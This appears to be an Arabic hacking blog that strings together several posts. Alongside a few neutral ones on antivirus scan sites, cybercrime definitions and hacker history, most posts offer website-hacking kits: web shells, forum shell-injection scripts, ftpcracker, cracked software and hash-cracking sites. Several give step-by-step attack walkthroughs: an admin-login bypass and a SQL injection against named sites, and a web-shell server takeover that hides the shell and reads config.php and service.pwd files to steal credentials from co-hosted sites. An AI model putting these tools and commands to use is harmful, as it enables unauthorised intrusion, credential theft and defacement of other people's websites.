اكبر مجموعه قيمه من اداوت اختراق المواقع كل ما يحتاجه الهكر هنا !

السلام عليكم ورحمة الله وبركاتة اسعد الله اوقاتكم بكل خير

يشرفني ويسعدني اخواني ان اضع لكم مجموعة قيمة من اداوت اختراق المواقع

واللتي اعتبرها بنظري لاغنى عنها في وقتنا هذا 

نبداء على بركة الله

برنامج Dr.KAsBeR لتشفير وفك تشفير
BaSe64

http://www.mediafire.com/?gmddyzmjdzd

================================================== =

برنامج فك الزنـد

http://www.mediafire.com/?3lkgwnmzygl

================================================== =

برنامج البيوتي

http://www.mediafire.com/?2klvmmzmyiz

================================================== =

برنامج تشفير و فك تشفير PHPlockit

http://www.mediafire.com/?juy3tdzm0hd

================================================== =

برنامج Acunetix Web Vulnerability Scanner 6

http://www.mediafire.com/?q3jdotynnng

الأصدار الأقدم

http://www.mediafire.com/?mneioj3yomx

================================================== =

شلات بصيغة XML للأستايلات والبلوقن

http://www.mediafire.com/?zutmo3oytmz
مجموعة اخرى
لكن مشفرة

http://www.mediafire.com/?ywygmxa4mdz

And

http://www.mediafire.com/?tvmitubntnd

================================================== =

سكربتات الاتصال بالقاعده

http://www.mediafire.com/?tvmitubntnd

مجموعة اخرى
http://www.mediafire.com/?tkmg5vlzivm

================================================== =

برنامج النت كات

http://www.mediafire.com/?tdmtznnmkmz

================================================== =

مكتبه لوكالات منوعه

http://www.gulfup.com/do.php?id=3495528

================================================== =

مترجم perl

http://www.mediafire.com/?ziumw35mt1z

================================================== =

شلات بصيغه asp

http://www.mediafire.com/?4mtz5gzhygi

================================================== =

برنامج السيرفر الشخصي WampServer2.0g-1

http://www.mediafire.com/?fhmuyyoycme

================================================== =

سكربتات قراءة الكونفيق على السيرفر

http://www.mediafire.com/?hzddlqjtyyf

================================================== =

مجموعة من الشلات المشفرة

http://www.mediafire.com/?4rtdj2mmvmd

مجموعة من الشلات الغير مشفرة

http://www.mediafire.com/?ozn2btg03m3

================================================== =

سكربت حقن قوالب المنتدى بشل

http://www.mediafire.com/?wmuut5mm1io

سكربت اخر

http://www.mediafire.com/?w2mnlyznamj

سكربت لتغيير قالب المنتدى الرئيسي

http://www.mediafire.com/?jzzemgzdvzz

================================================== =

مجموعة من سكربتات البيرل مختارة من اجلكم

منها
mass.pl & zone-h.pl & ftpcracker &.... etc
والعديد اكتشفها بنفسك

http://www.mediafire.com/?yjm2mtdd4vy

================================================== =

برنامج اخونا قاهر اليهود مع الملحقات

http://www.mediafire.com/?mnymnlzluy5

================================================== =

بيرل ومترجم بيرل من اخونا Dr.KAsBeR

http://www.mediafire.com/?mnzyjjionvg

================================================== =

مجموعة من شلات perl من تجميعي
تحتوي على ادوات الأختصار واستخراج اليوزرات مختصرة وجاهزة

http://www.mediafire.com/?m5ggnydmmo2

================================================== =

برنامج تصوير الشروحات بالفيديو مع الشرح والتعريب بسيط جداً
http://www.mediafire.com/?1zmlougbdoi

================================================== =

محرر الملفات EditPlus من افضل المحررات اللي تعاملت معاهـ
يحرر لك كل الملفات اللي تخطر على بالك وتقدر تشوف الأأكواد وكل شي بألوان php
يحرر لك txt & pl & php & html ... etc تقريباً كل الصيغ
البرنامج مع الكراك وسيريال وتعريب

http://www.mediafire.com/?tuzljomznnr

================================================== =

برنامج LeapFTP

http://www.mediafire.com/?ji4myznojmm

================================================== =

برنامج الفرونت بيج 2003 عربي مع السيريال

http://www.mediafire.com/?wim03xdyjkv

================================================== =

vulnerability scanner

يخمن على الـ Cpanel

+

# SQL Injection
# Cross site scripting
# *** Security
# Directory Traversal
# Ajax Application Security
# Google Hacking

<-------------------->

البرنامج من موقعه الرسمي بأخر أصدآر

http://www.acunetix.com/vulnerabilit...ityscanner.exe

<---

-------برنامج الـSQL--------------->

برنامج روعه ومتكامل من بحث عن لوحة التحكم الى فك الهاش الى استعراض الجداول والاعمدة

http://www.mediafire.com/download.php?edhh33km0jj

<-----------------برنامج فك الهاش MD5---------------------->

البرنامج هذا يعتمد على قواعد البيانات التابعة للمواقع

http://www.mediafire.com/download.php?w3zdtargnmy


أرجو أن أكون قد أفدتكم ... مع تحياتي لكم ...

Read More

شرح تثبيت BackTrack 5 Live على الــUSB

السلام عليكم ورحمة الله وبركاته


[شرح] تثبيت BackTrack 5 r2 Live على الــUSB

اولا : نحتاج الى فلاشة 4 جيغا على الاقل

ثانيا : تحميل BackTrack 5 r2 Live من هنا

ثالثا : unetbootin من هنا

تابع الشرح :

نقوم اولا بتحميل الباكتراك :

نختارالاعدادات التالية:

التحميل ياخذ وقتا طويلا يمكنك اختيار التحميل عن طريق التورنت في الخبار الاخير


في الصورة بدل من التحميل المباشر .

بعد ذلك نقوم بتحميل برنامج unetbootin

وبعد انتهاء التحميل نفتحه ثم نختار توزيعة الباكتراك كما هو موضح بالصورة 

سيطلب منا اعادة التشغيل نعيد التشغيل ومن الــ bios نغير الى الاقلاع من الفلاش ميموري .




انتهى الشرح .. في امان الله

Read More

مواقع لفك hash بانواع مختلفة

مواقع لفك هاش md5 اقوى المواقع

http://www.tobtu.com/md5.php
http://tmto.org/
http://www.md5decrypter.co.uk/
http://www.onlinehashcrack.com/
http://authsecu.com/decrypter-dechif...r-hash-md5.php
http://www.gat3way.eu/crack/search.php
http://www.md5this.com/index.php
http://www.netmd5crack.com/cracker/
http://cracker.kalkulators.org/
http://md5.rednoize.com/
http://md5.gromweb.com/
http://www.md5rainbow.com/
http://md5.digitalsun.pl/
http://isc.sans.edu/tools/reversehash.html
http://crackfor.me/
https://hashcracking.ru/index.php
http://www.hash-database.net/
http://www.hash-database.net/
http://md5decryption.com/
http://www.shell-storm.org/md5/


مواقع لفك هاش NTLM

http://www.md5decrypter.co.uk/ntlm-decrypt.aspx
http://www.onlinehashcrack.com/
http://www.hash-cracker.com/index.php
http://hashcrack.com/index.php
http://cracker.fox21.at/?type=ntlm


مواقع لفك هاش SHA1

http://www.md5decrypter.co.uk/
http://md5.rednoize.com/
http://www.hash-cracker.com/index.php
http://isc.sans.edu/tools/reversehash.html
https://hashcracking.ru/index.php
http://www.hash-database.net/

مواقع لفك هاش SHA256-512

http://www.hash-database.net/
http://md5.shalla.de/cgi-bin/search.cgi


مواقع لفك هاش MySQL

http://www.onlinehashcrack.com/
http://www.cmd5.org

Read More

متصفحات القرصان المحترف

السلام عليكم ورحمة الله تعالى وبركاته

إن القرصان المحترف لا بد له من تأمين نفسه حتى لا يغدر به من الخلف ويردى قتيلا أو مأسورا ولذلك دعت

الحاجة الماسة إلا إيجاد وسيلة للتخفي عن أعين وجواسيس العدو وردا على ذلك

نحضر لكم اليوم متصفحات لها خاصية التخفي والحماية ونضعها بين يدكم

نبدأ:

أولا :

cyberdragonbrowser


إسم على مسمى إنه من افضل المتصفحات على الإطلاق حيث تمكن خصائصه الجمة من عمل كل ما يحتاجه

القرصان ،ويجد الذكر بإن بطيء قليلا لكنه الافضل وإليكم واجهته :

بعد تنزيله وتنصيبه ستظهر لكم شاشة :

وفي الجانب الأيمن تلاحظون شاشة صغيرة بها كل الخصائص .
وللتحميل :

http://sourceforge.net/projects/cyberdragonbrowser

ثانيا:

epicbrowser

وهذا أيضا نوعا ما يشبه قوغل اكروم في الواجهة لكنه يمتاز عنه بالقدرة على التخفي و خصائصه جمة.

للتحميل :

https://www.epicbrowser.com /

Read More

أهم و اقوى مواقع فحص الملفات المفيرسة او الملغومة

السلام عليكم ورحمة الله وبركاته

هذه اهم مواقع كشف التلغيم والفايروسات الموجودة بملف مشكوك فيه

المواقع تفحص على اشهر برامج الحماية واقواها


ملاحظة : المواقع تنفعنا فقط في فحص الملفات ذات الحجم الصغير ففي حالات كثيرة نحتاج الى فحص الملف باكثر من طريقة خصوصا في الملفات الكبيرة الحجم .

اليكـــم المواقع:

---------------------------------------------------------------

ThreatExpert
http://www.threatexpert.com/filescan.aspx

---------------------------------------------------------------

VirusTotal
http://www.virustotal.com/

---------------------------------------------------------------

VirSCAN.org
http://www.virscan.org/

---------------------------------------------------------------

Anubis
http://anubis.iseclab.org/index.php

---------------------------------------------------------------
Jotti's Malware Scan
http://virusscan.jotti.org/fr

---------------------------------------------------------------

Symantec Security Check
http://security.symantec.com

---------------------------------------------------------------
Microsoft Malware
https://www.microsoft.com/security/portal/submit.aspx

---------------------------------------------------------------

Avast
http://onlinescan.avast.com/

---------------------------------------------------------------

Kaspersky en ligne virus scanner
http://www.kaspersky.com/virusscanner

---------------------------------------------------------------

McAfee FreeScan
http://fr.mcafee.com/root/mfs/default.asp

---------------------------------------------------------------

Panda ActiceScan 2.0
http://www.pandasecurity.com/activescan/index/

---------------------------------------------------------------

BitDefender Scanner
http://www.bitdefender.com/scan8/ie.html

---------------------------------------------------------------

Eset Analyse
http://www.eset.com/onlinescan/


---------------------------------------------------------------

Kaspersky Virus Scanner
http://www.kaspersky.com/scanforvirus

---------------------------------------------------------------

VirusChief
http://www.viruschief.com/

   تحياتي

Read More

اظهار جميع اسماء و باسوردات الويفي Wifi التي استعملتها في الجهاز !

شرح اظهار جميع اسماء و باسوردات الويفي Wifi التي استعملتها في الجهاز 

Video :

ملاحظة هامة جداا !!
بتقدروا تعملوا نفس الطريقة على الفيسبوك
رابط الموقع الرسمي :
http://www.securityxploded.com/

Read More

ثغرة تدخلك للوحة التحكم بدون تسجيل البيانات

السلام عليكم جميعا احبائي
اليوم راح نطبق ثغرة تخليك تدخل لاي موقع مركب هذا السكربت
بدون متخلي يوزر وباسوورد
شلون هاي....... اني اكلك
اولا نخلي الدورك في العم العزيز كوكل
"Powered by: Resell Rights Fortune"
نختار اي موقع مركب هذا السكربت خلي نطبق على هذا الموقع اني خترقتو قبل
http://www.etipbay.com
اول خطوى تضيف بعد الرابط مسار الوحه
/admin/index.php
بعدين طبق مثل الصورة نضغط كلك يمين ونروح لفحص العنصر اخر خيار

اقرأ المزيد: ثغرة تدخلك للوحة التحكم بدون تسجيل البيانات

ونغير كلمة Admin Login الى >> You need to login in to access that page <<
كيف نغير اضغط مرتين كلك وكتب

واخيرا اضغط دخول بدون متعبي البيانات ههههههههه

==============

Read More

جرائم الحاسوب

عرف John Carrol و Gion Green جريمة الحاسوب على أنها "أي عمل ليس له في القانون أو أعراف قطاع الأعمال جزاء ،يضر بالأشخاص أو الأموال ،ويوجه ضد أو يستخدم التقنية المتقدمة (العالية) لنظم المعلومات" ،ويمكن القول أن جرائم الحاسوب هي القضايا الغير قانونية التي يستخدم بها الحاسوب،مثل الدخول غير الشرعي للبيانات والحواسيب ،والتخريب والتجسس والسرقة والتزوير وغيره.
ولقد أوجد مشروع الإتفاقية الأوروبية (عام (200 - 2001)) تقسيما جديداً نسبياً فقد تضمن أربع طوائف رئيسية لجرائم الحاسوب والإنترنت :
1- الجرائم التي تستهدف عناصر السرية والسلامة وتضم:

• الدخول غير القانوني (غير المصرح به)
• الإعتراض غير القانوني.
• تدمير المعطيات.
• اعتراض النظم.
• إساءة استخدام الأجهزة.

2- الجرائم المرتبطة بالحاسوب وتضم :

• التزوير المرتبط بالحاسوب
• الإحتيال المرتبط بالحاسوب.

3- الجرائم المرتبطة بالمحتوى وتضم طائفة واحدة وفق هذه الإتفاقية وهي جرائم متعلقة بالأفعال الإباحية والأخلاقية.
4-الجرائم المرتبطة بالإخلال بحق المؤلف والحقوق المجاورة - قرصنة البرمجيات.

أمثلة:

• في دولة الإمارات كشفت شرطة دبي النقاب عن سرقات مالية تمت عبر الإنترنت من حسابات لعملاء في 13 بنكاً محلياً وعالمياً قام بارتكابها مهندس حاسوب آسيوي يبلغ من العمر 31 عاماً ارتكب جرائمه عبر أحد مقاهي الإنترنت في دبي.

• قضية المراهق الذي دخل على أجهزة شركة AT&T وقام بسرقة برمجيات تعادل مليون دولار.

• وأيضا مراهق أردني قام بتحويل مبلغ بسيط من كل حساب في فروع المملكة الأردنية إلى حسابه الشخصي فوجدو حسابه مليء بملايين الدولارات.

مجموعة المجهول وما ترتكبه من جرائم بحق مواقع الإنترت في وقتنا الحالي.

Read More

من هم anonymous

 

 

لعل ان الكثير منا سمع بهذا الاسم انونيموس يمكن ان  هذا الاسم إشتهر اكثر مع احداث ويكي ليكس لكن في الحقيقة المجموعة قديمة جدا .

خلافا على مايظن البعض ان انونيموس هي مجموعة من الهاكرز الخارجين عن القانون .  في الحقيقة انونيموس اكبر من ذلك بكثير فأنونيموس ليست بمجموعة  هاكر بالتعبير الحقيقي للكلمة ، انونيموس هي مجموعة من الناس عندما يرون  ان شيئ ما غلط ،يبادرون إلى تصحيح رؤية العالم إليه ، نعم بالطبع المجموعة تحتوي كذلك على هاكرز لكن عدد الهاكرز المنتمين إلى المجموعة قليل . تهدف انونيموس إلى ،الكشف عن  المعنى الحقيقي لكلمة سينتولوجيا والتي تستند إلى الفكر العلماني خصوصا, كذلك بالنسبة لمن يؤمنون بالتعاليم الدينية والمعتقدات التي يستتند إليها الفكر العلماني . وهذا مقتطف من رسالة انونيموس ب تاريخ 6 فبراير 2008 "...أتحدث، بطبيعة الحال، عن كنيسة السيانتولوجيا. ومع ذلك،نحن نريد أن يكون معلوما أننا لا نسعى لإنزال السيونتولوجيين، أو حتى السيانتولوجيا نفسها. نريد فقط تدمير 

"المنظمة في الشكلها  الحالي . ونريد  الناس داخل السيانتولوجيا معرفة الحقيقة حول هذا الموضوع

  

انونيموس الهاكرز
 

تعتقد مجموعة انونيموس  انها  ليست مجموعة تؤثر سلبا على حياة الناس بل انها موجودة لتساعد الضعيف وتنصفه ، كما انها لاتقوم ولن تقوم بالتعدي على الابرياء .
يمكن انها في بعض الاوقات تجسد حالة من الفوضى ، ولكن بالنسبة للمجموعة ان الفوضى لا تعني الخطر ، أو عدم وجود قواعد ظابطة . فالفوضى حسب انونيموس تعني  التغيير. ، لأن عندما يكون هناك شيء خاطئ ، فإنه يحتاج إلى تغيير.

 

انونيموس المجهول

هناك أيضا بعض اللبس حول لماذا انونيموس ترتدي الاقنعة ؟. في الحقيقة ليس إرتداء الاقنعة هو إخفاء لهوية المجموعة بقدر ماهو إخفاء لهوية الفرد ذاخل الجماعة ، فعند الإنتماء إلى مجموعة انونيموس يفتقد الفرد هويته ويكتسب هوية الجماعة ، انونيموس تعني  المجهول.

Read More

شرح إستغلآل ثغرات ASP

السلام عليكم ورحمة الله وبركاته

اليوم وبعد انقطاع عن المواضيع .. قررت اعمل لكم شرح عن استغلال ثغرات asp ..

هذه البرمجة نادرة الاستخدام الا فى المواقع الكبيرة مثل البنوك والشركات ..

ساشرح لكم كيفية استغلال خطأ sql تابع معى ..

انا ساشرج لكم على موقع www.haybersqlogretiyo.com

المنطقة المصابة بثغرة sql نضع بعد الرابط وبعد المتغير علامة " او '

www.haybersqlogretiyo.com/baskabibolum.asp?id=10"

يظهر لنا الخطأ التالى :

كود PHP:

Microsoft JET Database Engine error ’80040e14’ 

Syntax error in string in query expression ’id = 10";’. 

/baskabirbolum.asp, line 7 

الان نبدا نعد بالاعمدة للوصول الى العمود المطلوب

http://www.haybersqlogretiyo.com/bas...=10+order+by+1

الان عند الوصول الى العمود المصاب وهو 10

http://www.haybersqlogretiyo.com/bas...10+order+by+10

يظهر الخطأ التالى :

كود PHP:

Microsoft JET Database Engine error ’80040e14’ 

The Microsoft Jet database engine does not recognize ’10’ as a valid field name or expression. 

/news.asp, line 7 

ويكون العمود المصاب الرقم 8

http://www.haybersqlogretiyo.com/bas...=10+order+by+8

http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6, 7--

الان عند الوصول الى الرقم 7 يظهر لنا هذا الخطا وبداخله اسم القاعدة

كود PHP:

Microsoft JET Database Engine error ’80040e37’ 

The Microsoft Jet database engine cannot find the input table or query ’hayber’. Make sure it exists and that its name is spelled correctly. 

/baskabirbolum.asp, line 7 

واسمها : hayber

ويتم استغلالها .

http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6, 7+from+hayber

والان نظهر اسم اليوزر والباس

Read More

تعريف عام للهاكر و انواعه

السلام عليكم اخوتى

البداية

و مع ظهور الإنترنت و انتشاره دولياً, أنتجت شركة IBM عام 1981م جهاز أسمته ( الكمبيوتر الشخصي) الذي يتميز بصغر حجمه و وزنه الخفيف بالمقارنة مع الكمبيوترات القديمة الضخمة, و أيضا سهولة استخدامه و نقله إلى أي مكان و في أي وقت, و استطاعته الاتصال بالإنترنت في أي وقت. عندها, بدأ الهاكرز عملهم الحقيقي بتعلم كيفية عمل هذه الأجهزة و كيفية برمجة أنظمة التشغيل فيها و كيفية تخريبها, ففي تلك الفترة ظهرت مجموعة منهم قامت بتخريب بعض أجهزة المؤسسات التجارية الموجودة في تلك الفترة. يوماً بعد يوم ظهرت جماعات كبيرة منافسة , تقوم بتخريب أجهزة الشركات و المؤسسات حتى بدأت هذه المجموعات الحرب فيما بينها في التسعينات من هذا القرن و انتهت بإلقاء القبض عليهم .

اولا تعريف عام للهاكر





الهاكر عموما كلمة تصف المختص المتمكن من مهارات في مجال الحاسوب وأمن المعلوماتية. والهاكر (بالإنجليزية: Hacker)

أساسا كلمة أطلقت على مجموعة من المبرمجين الأذكياء الذين كانوا يتحدوا الأنظمة المختلفة ويحاولوا اقتحامها، وليس بالضرورة أن تكون في نيتهم ارتكاب جريمة أو حتى جنحة، ولكن نجاحهم في الاختراق يعتبر نجاحا لقدراتهم ومهارتهم

إلا أن القانون اعتبرهم دخلاء تمكنوا من دخول مكان افتراضي لا يجب أن يكونوا فيه. والقيام بهذا عملية اختيارية يمتحن فيها المبرمج قدراته دون أن يعرف باسمه الحقيقي أو أن يعلن عن نفسه. ولكن بعضهم استغلها بصورة إجرامية تخريبية لمسح المعلومات والبعض الآخر استغلها تجاريا لأغراض التجسس والبعض لسرقة الأموال

تصنيف الهاكر أخلاقيا

* الهاكر ذو القبعة البيضاء (White hat hacker)، ويطلق على الهاكر المصلح.
*الهاكر ذو القبعة السوداء (Black hat hacker)، يطلق على الهاكر المفسد.
* الهاكر ذو القبعة الرمادية (Grey hat hacker)، المترنح بين الإصلاح والعبث.

أما اصطلاح القبعات فأصله مرتبط بتاريخ السينما وخصوصا أفلام رعاة البقر حيث كان الرجل الطيب يرتدي دائما قبعة بيضاء بينما يرتدي الرجل الشرير قبعة سوداء





الهاكر ذو القبعة البيضاء

الهاكر ذو القبعة البيضاء : هو مصطلح يطلق علي الهاكر الاخلاقي الذي يتعارض مع مفهوم اختراق انظمة الحواسيب و الاطلاع علي خصوصية الغير او انتهاك حقوق الملكية او حقوق النشر ويتركز علي حماية الانظمة واكتشاف ثغراتها واغلاقها او ايجاد حلول لها لحمايتها من الهاكر الاسود الذي يهدف الي اختراق الانظمة.

الهاكر ذو القبعة السوداء

الهاكر ذو القبعة السوداء : هو الهاكر الذي يقوم باختراق الانظمة وانتهاك حقوق الملكية او حقوق النشر او خصوصية الغير وفي فكره انه يجب ان تكون كل المعلومات مجانا وحرة و لاتثق بالسلطه وروج للامركزية والهكر يقدر بامكانيته لا بجنسه او لونه او ماله ولا قيود امامه.

الهاكر ذو القبعة الرمادية

الهاكر ذو القبعة الرمادية : هو مصطلح يطلق في مجتمع امن الحواسيب علي القرصان الذي يقوم باعمال قانونية احيانا او بمساعده امنية كما يملي عليه ضميره احيانا او باختراق موذ في احيان اخري انه باختصار عبرة عن مزيج من القرصان الابيض والقرصان الاسود القبعة لذا اختير له اللون الرمادي كلون وسط بين الابيض والاسود و في العادة لا يقوم هذا النوع من القراصنة بالاختراق لاغراض خبيثة او لمصلحة شخصية بل لزيادة خبرته في الاختراق واكتشاف الثغرات الامنية .

Crackers

مؤلفوا الفيروسات
يقوم هذا النوع من الهاكر بتصميم الفيروسات محبة في التخريب و تدمير الاجهزه و يعتبر المحللون النفسيون أن من ينتمي إلى هذا النوع من المبرمجين مصاب بمرض عقلي أو نفسي , يدفعه إلى هذه العمليات التخريبية التي لا يجني منها أي فائدة شخصية , ويعتبر هذا النوع من أخطر الانواع


ويوجد انواع اخرى


اشهر الهاكرز و الكراكر : اشهر الهاكر والكراكر التي سجلهم التاريخ :

Vladimir Levin: ذكي في الرياضيات وهذا أحد أهم أسباب اعتقاده بشهرته, تَخرّجَ مِنْ جامعةِ بيترسبيرغ تيخنولوجيتشيسكاي وكَانَ العقل المدبر وراء عصابةَ لصِّ الكومبيوتر الروسيةِ التي غَشّتْ حاسباتَ سيتيبانك إلى إعْطاء ال10$ مليون.

Johan Helsingius: معروف بإنشاء باعث الايميلات المشهور والمسمى بـ Penet.fi

Kevin Mitnick : اسم الشهرة له على الشبكة كان كوندور Condor. كمراهق لم يستطع أن يوفر لنفسه حاسوبه الخاص, إحدى الأشياء غير العادية عن ميتنيك أنه استعمل غرف المحادثة في الإنترنت لارسال رسائل لأصدقائه, تم الحكم عليه أول مرة بالسجن لمدة سنة في إصلاحية، كيفن من القراصنة الخالدين حيث اعتبر أول قرصان يكتب اسمه في لوائح الأف بي أي بين المجرمين الأكثر مطلوبين.

ومعلومات اكثر من ويكبيديا

كيفين ديفيد ميتنيك (بالإنجليزية: Kevin Mitnick‏) ولد في اوت 1963 وهو أحد أشهر مخترقي الأنظمة الذين تم سجنهم. تم اعتقاله من قبل مكتب التحقيقات الفدرالي الأمريكي FBI في 15 فبراير 1995. تم تجريمه بالتلاعب الإلكتروني واختراق أنظمة الحاسوب لدى كل من فوجيتسو وموتورولا ونوكيا وصن مايكروسيستمز. قضى ميتنيك خمسة سنوات في السجن (اربعة منها قبل المحاكمة)، 8 أشهر منها في الحبس الانفرادي، وتم إطلاق سراحه في 21 يناير 2000. وخلال فترة مراقبته بعد إطلاق سراحه، والتي إنتهت في 21 يناير 2003، منع من استخدام أي شكل من تكنولوجيا الاتصالات، باستثناء الهاتف الأرضي، مع بعض الاستثنائات. يرى المحققون الفيدراليون في أمريكا أن كيفين الملقب بالكوندور –نسر أمريكي - خطر لدرجة أنه قادر باتصال هاتفي واحد على وضع البلاد في حالة استنفار قصوى، استعداداً لحرب عالمية ثالثة، بفضل قدرته على اقتحام أخطر المواقع، عبر شبكات الكمبيوتر والهاتف!

Read More

ما هي ثغرة sql injection و كيف أتعرف على المواقع المصابة بها

تعريف SQL-injection :
هي تقنيه المستخدمة للاستفادة من الضعف اصدار عن اوامر الكترونيه عبر شبكة لتنفيذ التطبيق من قاعدة البيانات الخلفية ( SQL ) وطبعا المهاجمون يعملون علي الاستفادة الحقيقة من هذا الضعف للوصول الي المعلومات السريه الخاص بالموقع

نبداء شرح استغل SQL-injection عن طريق الخطاء
mysql_fecth_array()

مثل الموقع المستهدف
[****]
كود:
---------------------------------------------
http://www.site.com/index.php?id=1
---------------------------------------------

طبعا لإكتشاف الخطأ سنحاول ندخل رمز غير معروف في القاعده لحدوث الخطاء مثل

كود:
---------------------------------------------
'1
---------------------------------------------

ليكون الموقع بالشكل التالي

الكود :
--------------------------------------------------------
'http://www.site.com/index.php?id=1
--------------------------------------------------------

بعدين عند إدراج الرمز سيعطيك هذه الكتابة

الكود :
------------------------------------------------------------------------------------------------------
Warning: mysql_fecth_array(): supplied argument is not a valid MySQL result resource in
/home/site/index.php on line N
------------------------------------------------------------------------------------------------------

في نظركم ماذا يعني هذا ؟؟؟؟
يعتي أنه الموقع مصاب بثغرة sql injection

طبعا الحمد لله إنتهينا من مرحلة التعرف هل الموقع مصاب بهذه الثغرة

الأن ما هي طرق إستغلال هذه الثغرة ؟؟؟؟؟
هناك طريقتان لإستغلالها

الطريقة الأولى : عن طريق برنامج الشهير havij
الطريقة الثانية : عن طريق الحقن اليدوي

أنا الأن لا أستطيع أن أشرح الطريقتان لأني فعلت هذا الموضوع لكي أشرح ماهي ثغرة sql injection وطريقة تعرف هل الموقع مصاب بها
إنشاء الله في الشرح المقبل سأتطرق لشرح الطريقتان ولاكن فيديو إنشاء الله

و السلام عليكم و رحمة الله تعالى و بكاته

Read More

طريقة اختراق السيرفرات

طريقة اختراق السيرفرات ..

نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي سيرفر..

وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا

قم بتحميل سكربت الشيل بلغة php على جهازك
وهذي وصلة الشيل.. (( متطور )) http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip
------------------------------------------------------------------------------
بسم الله نبدأ في الشرح ::--

البي اتش بي شيل ((phpshell )) هو سكربت بلغة (( php ))

وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config
للتي على السيرفر..

ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على موقعك او الموقع الذي اخترقته..

ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..

وللتوضيح اكثر..

نفترض انك اخترقت الموقع www.USA.com وقمت بتحميل الــ phpshell
على ملف download
فسيصبح العنوان www.USA.com/download/phpshell.php

وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ

في الفراغ هذا سوف نضع فيه اوامر اللينكس..

ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--

يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..

ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي
لاخفاءه نسوي كذا بالطريقة هذي www.USA.com/download/phpshell.php wget
وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد..

---------------------------------------------
ندخل الى موضوعنا

والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا www.USA.com/download/phpshell.php

وثم نجد كتابة اسمها Command وامامها فراغ

في الفراغ هذا ندخل اوامر اللينكس عليه..

وندخل الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..

ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود
((safe mode))
=============---==-- شرح الاوامر --==--==============
الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات

نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))

1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له

اكتب هذا الامر
find / -name config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع ))
ونلاحظ ان التي باللون الزهري هي الموقع..

طيب نبي نقرأ الي متكوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
ونلاحظ ان الموقع هو www.ainvar.net والمنتدى من نوعية phpBB

المهم نبي نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

وثم راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات

روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات
او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup

-------------------------------------------------------
الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..

اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd

وراح يطلع لنا المواقع بالشكل ذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب الان ابي استعرض الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا

cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

وراح يجينا الباسورد للموقع ومشفر بمقياس DES

----------------------------------------------------------
طيب يوجد طريقة اخرى افضل من ذلك

نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_html/_vti_pvt/access.cnf

وراح يجينا الباسوردات لكل المواقع..

ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى وسوف تجدها ..
او قول لي وانا اعطيك افضلها واغلبها..

وفي النهاية اتمنى انكم استفدتو من الدرس المبسط عن الاختراق عبر الشيل
وللذين يريدون نقل الموضوع يجب عليهم ذكر المصدر + الحقوق .. وشكرا

Read More